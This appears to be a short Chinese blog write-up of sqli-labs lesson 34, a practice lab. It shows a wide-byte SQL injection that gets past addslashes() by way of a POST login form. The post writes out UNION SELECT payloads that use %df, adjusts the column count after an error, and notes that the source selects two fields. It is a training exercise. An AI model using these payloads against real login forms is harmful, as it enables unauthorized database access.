当前位置:Gxlcms > 数据库问题 > 【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

时间:2021-07-01 10:21:17 帮助过:57人阅读

=1%df‘ union select 1,2,3#

提交报错

技术分享图片

列名不匹配,改一下就好了

uname=1&passwd=1%df‘ union select 1,2#

技术分享图片

看一下源码,果然只select了两个字段

技术分享图片

 

【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

标签:匹配   image   sql   技术分享   class   span   版本   bubuko   col   

人气教程排行